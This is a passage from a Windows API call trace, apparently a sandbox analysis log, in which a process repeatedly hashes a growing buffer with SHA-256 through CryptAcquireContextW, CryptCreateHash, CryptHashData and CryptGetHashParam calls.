Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.236] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0119.236] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.236] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45770 [0119.236] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45770, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45770, pdwDataLen=0xceadc) returned 1 [0119.236] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.236] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.236] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.237] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.237] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x900, dwFlags=0x0) returned 1 [0119.237] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.237] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e457a0 [0119.237] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e457a0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e457a0, pdwDataLen=0xceadc) returned 1 [0119.237] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.237] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.237] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.237] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.237] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x920, dwFlags=0x0) returned 1 [0119.237] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.237] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45800 [0119.237] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45800, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45800, pdwDataLen=0xceadc) returned 1 [0119.238] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.238] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.238] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.238] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.238] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x940, dwFlags=0x0) returned 1 [0119.238] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.238] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45830 [0119.238] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45830, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45830, pdwDataLen=0xceadc) returned 1 [0119.238] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.238] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.238] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.239] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.239] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x960, dwFlags=0x0) returned 1 [0119.239] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.239] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45da0 [0119.239] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45da0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45da0, pdwDataLen=0xceadc) returned 1 [0119.239] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.239] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.239] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.240] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.246] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x980, dwFlags=0x0) returned 1 [0119.246] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.246] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45dd0 [0119.246] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45dd0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45dd0, pdwDataLen=0xceadc) returned 1 [0119.246] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.246] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.246] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.247] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.247] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0119.247] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.247] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45fe0 [0119.247] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45fe0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45fe0, pdwDataLen=0xceadc) returned 1 [0119.247] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.247] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.247] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.248] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.248] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0119.248] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.248] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46070 [0119.248] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46070, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46070, pdwDataLen=0xceadc) returned 1 [0119.248] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.248] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.248] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.248] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.249] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0119.249] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.249] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45e30 [0119.249] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45e30, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45e30, pdwDataLen=0xceadc) returned 1 [0119.249] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.249] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.249] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.249] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.249] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0119.249] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.249] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45e90 [0119.249] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45e90, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45e90, pdwDataLen=0xceadc) returned 1 [0119.250] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.250] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.250] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.250] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.250] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0119.250] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.250] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e462b0 [0119.250] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e462b0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e462b0, pdwDataLen=0xceadc) returned 1 [0119.250] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.250] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.250] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.251] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.251] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0119.251] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.251] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45d70 [0119.251] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45d70, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45d70, pdwDataLen=0xceadc) returned 1 [0119.251] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.251] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.251] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.252] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.252] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0119.252] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.252] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45f20 [0119.252] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45f20, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45f20, pdwDataLen=0xceadc) returned 1 [0119.252] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.252] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.252] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.252] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.252] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0119.252] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.252] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e460d0 [0119.252] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e460d0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e460d0, pdwDataLen=0xceadc) returned 1 [0119.252] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.253] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.253] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.253] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.253] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0119.253] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.253] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46490 [0119.253] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46490, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46490, pdwDataLen=0xceadc) returned 1 [0119.253] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.253] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.253] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.254] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.254] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0119.254] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.254] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e461f0 [0119.254] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e461f0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e461f0, pdwDataLen=0xceadc) returned 1 [0119.254] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.254] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.254] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.256] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.256] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0119.256] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.256] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46310 [0119.256] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46310, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46310, pdwDataLen=0xceadc) returned 1 [0119.256] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.256] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.256] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.256] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.256] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0119.256] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.256] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45e60 [0119.256] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45e60, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45e60, pdwDataLen=0xceadc) returned 1 [0119.256] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.257] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.257] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.257] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.278] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0119.278] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.278] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45ec0 [0119.278] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45ec0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45ec0, pdwDataLen=0xceadc) returned 1 [0119.278] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.278] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.278] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.279] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.279] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0119.279] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.279] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46400 [0119.279] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46400, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46400, pdwDataLen=0xceadc) returned 1 [0119.279] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.279] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.279] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.280] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.280] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0119.280] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.280] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45d10 [0119.280] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45d10, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45d10, pdwDataLen=0xceadc) returned 1 [0119.280] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.280] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.280] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.281] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.281] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0119.281] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.281] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45f50 [0119.281] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45f50, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45f50, pdwDataLen=0xceadc) returned 1 [0119.281] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.281] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.281] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.281] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.281] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0119.281] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.281] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45f80 [0119.281] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45f80, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45f80, pdwDataLen=0xceadc) returned 1 [0119.282] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.282] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.282] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.282] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.282] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0119.282] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.282] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e45d40 [0119.282] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e45d40, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e45d40, pdwDataLen=0xceadc) returned 1 [0119.282] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.282] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.282] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.283] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.283] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0119.283] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.283] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46280 [0119.283] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46280, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46280, pdwDataLen=0xceadc) returned 1 [0119.283] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.283] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.283] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.284] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.284] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0119.284] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.284] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46430 [0119.284] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46430, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46430, pdwDataLen=0xceadc) returned 1 [0119.284] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.284] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.284] 